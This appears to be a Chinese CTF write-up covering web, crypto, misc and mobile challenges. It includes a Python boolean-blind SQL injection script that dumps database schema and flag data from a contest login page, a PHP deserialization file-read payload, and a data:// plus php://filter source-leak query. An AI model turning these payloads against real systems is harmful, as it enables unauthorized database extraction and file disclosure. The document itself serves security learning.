web

Query

布尔盲注

import requests
import string

dictionary = string.digits+string.ascii_letters+"_-{,}"
url = "http://cd5a2660b462c867.node.nsctf.cn/login.php"
xxx=""
for i in range(1,666):
    print("正在爆破第{}位".format(i))
    for j in dictionary:
        flag = True
        
        # payload = "admin'and substr((select group_concat(schema_name) from information_schema.schemata),{},1) = binary'{}' #".format(i,j)  
        # payload = "admin'and substr((select group_concat(table_name) from information_schema.tables where table_schema = 'ctf'),{},1) = '{}' #".format(i,j)              
        # payload = "admin'and substr((select group_concat(column_name) from information_schema.columns where table_schema = 'ctf' and table_name = 'f111'),{},1) = '{}' #".format(i,j)              
        payload = "admin'and substr((select group_concat(flagdata) from ctf.f111),{},1) = '{}' #".format(i,j)              

        data = {'password':'admin','username':payload}
        res = requests.post(url=url,data=data)

        if ('admin' in res.text):
            xxx += j
            print(xxx)
            flag = False
            break
    if(flag):
        print(xxx)
        break

Deserialization

伪协议读源码

route.php

h1nt.php

构造

<?php
class test
{
    public $position = 'f14g.php';
    public function __clone(){  
        echo file_get_contents($this->position); 
        return $this->position;
    }
}  
$a = new test();
echo urlencode(serialize($a));

然后在index.php包含h1nt.php

read=h1nt.php&input=O%3A4%3A%22test%22%3A1%3A%7Bs%3A8%3A%22position%22%3Bs%3A8%3A%22f14g.php%22%3B%7D

CodeCheck

这里利用data协议使得get_file_content返回的值为flag

?a=data://text/plain,flag&b=data://text/plain,flag&c=flag&d=php://filter//convert.iconv.SJIS*.UCS-4*/resource=index.php

crypto

secret

e phi 不互素

流哇流

flag2

from sympy import *
from gmpy2 import *
from functools import reduce
from primefac import *
def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)
def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception('modular inverse does not exist')
    else:
        return x % m
def crack_unknown_increment(states, modulus, multiplier): 
    increment = (states[1] - states[0]*multiplier) % modulus 
    return modulus, multiplier, increment
def crack_unknown_multiplier(states, modulus):    
    multiplier = (states[2] - states[1]) * modinv(states[1] - states[0], modulus) % modulus 
    return crack_unknown_increment(states, modulus, multiplier)

def crack_unknown_modulus(states): 
    diffs = [s1 - s0 for s0, s1 in zip(states, states[1:])] 
    zeroes = [t2*t0 - t1*t1 for t0, t1, t2 in zip(diffs, diffs[1:], diffs[2:])] 
    modulus = abs(reduce(gcd, zeroes)) 
    return crack_unknown_multiplier(states, modulus)

states = [7762911616316678361, 8778349545254661087, 2182563361653435704, 1383751637647655272, 4512576578889812021, 4322633144718249958, 3959701111371594748, 7676663421477866678, 5009230933212388616, 3780469426700690705]
seed = 6473702802409947663
modulus, multiplier, increment =crack_unknown_modulus(states)
print(modulus)   #9223372036854775783
print(multiplier)   # 672257317069504228
print(increment) #0

flag1找到类似的原题了,ciscn的

直接改改数值套脚本

key = '11110010001101101001001110001001'
mask = '10100100000010000000100010010100'
 
R = ''
tem = key
for i in range(32):
    output = '?' + key[:31]
    ans = int(tem[-1-i]) ^ int(output[-3]) ^ int(output[-5]) ^ int(output[-8]) ^ int(output[-12]) ^ int(output[-20]) ^ int(output[-27]) ^ int(output[-30])
    R += str(ans)
    key = str(ans) + key[:31]
 
# R = format(int(R[::-1],2),'z')
R = str(hex(int(R[::-1],2))[2:])
print(R)

flag2 = 9223372036854775783
# flag1 = 0x81415720
flag1 = 2168543008
flag = '81415720'+str(flag2)
print(hashlib.md5(flag.encode("utf-8")).hexdigest())

misc

zip

爆破密码01组成的9位

然后解压得到flag

SimpleDocument

foremost 抽出pdf 全选复制得到flag

BeautifulImage

zsteg 出base64 解码得flag

mobile

peacock

dex2jar

看了看jar包没什么东西,那么核心应该在so里

ida看so文件

感觉最后那两个字符串像base64

然后考虑base64换表,表就是下面那个,解得flag

后记

妈的应该是阳了,头巨痛,还得好好学,输出太低了